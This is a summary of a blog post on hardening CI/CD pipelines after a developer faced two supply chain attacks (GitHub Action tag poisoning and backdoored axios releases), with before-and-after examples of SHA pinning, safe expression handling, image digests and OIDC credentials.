Hardening CI/CD Pipelines Against Zero-Day Supply Chain Attacks

Two Supply Chain Attacks in Two Weeks - Why Defense-in-Depth Saved Me

Felix Ortiz experienced two distinct supply chain attacks within 14 days targeting his CI/CD infrastructure via tag poisoning and backdoored npm packages. In the axios compromise, a malicious postinstall script phoned home to a C&C server for six seconds before the runner completed its job.

Why This Matters

The technical reality of modern development is that transitive dependencies and global installs often bypass project manifests and lockfiles, creating a shadow attack surface that standard security scans miss. This incident underscores the failure of relying on registry trust; even with axios not present in the project’s package.json, a global install in a DAST security workflow introduced the backdoor, proving that defense-in-depth and least-privilege permissions are the only reliable safeguards when upstream maintainer accounts are compromised.

Key Insights

• Tag poisoning of aquasecurity/trivy-action in March 2026 demonstrated that mutable version tags can be silently redirected to malicious commits.
• Backdoored axios versions 1.14.1 and 0.30.4 contained hidden postinstall scripts targeting CI/CD build infrastructure to exfiltrate secrets.
• Short-lived GITHUB_TOKEN credentials, which expire within 24 hours per GitHub documentation, effectively limited the blast radius of the runner compromise.
• OIDC-based workload identity federation prevents attackers from pivoting to cloud environments even if repository workflow files are read.
• Dependabot can be used to manage immutable SHA-pinned references, turning manual hardening into an automated security practice.

Working Examples

Replacing mutable version tags with immutable 40-character commit SHAs.

# Before - mutable tag
- uses: actions/checkout@v4
# After - immutable SHA
- uses: actions/checkout@de0fac2e... # v6

Preventing shell script injection by moving GitHub Action expressions to environment blocks.

# Before - injection risk
run: |
  if [ -n "${{ steps.some-step.outputs.VALUE }}" ]; then
# After - safe
env:
  STEP_VALUE: ${{ steps.some-step.outputs.VALUE }}
run: |
  if [ -n "$STEP_VALUE" ]; then

Pinning container images to immutable SHA256 digests to prevent tag-based attacks.

# Before
image: postgres:17
# After
image: postgres@sha256:b994732f... # 17

Practical Applications

• System: CI/CD Workflows. Behavior: Replace all ‘npm install -g’ commands with pinned versions to avoid pulling malicious latest releases during registry compromise. Pitfall: Using unpinned global installs bypasses lockfiles entirely, leaving no trace in the project manifest.
• System: Cloud Authentication. Behavior: Utilize OIDC federation instead of static secrets for cloud provider access. Pitfall: Storing long-lived cloud credentials in repo secrets allows attackers with ‘contents: read’ access to exfiltrate them and persist in the environment.
• System: Dependency Management. Behavior: Run ‘npm audit signatures’ to flag packages lacking OIDC attestations. Pitfall: Ignoring package provenance increases the risk of installing unverified code from compromised maintainer accounts.

References:

• https://dev.to/felixortizdev/two-supply-chain-attacks-in-two-weeks-why-defense-in-depth-saved-me-2nd7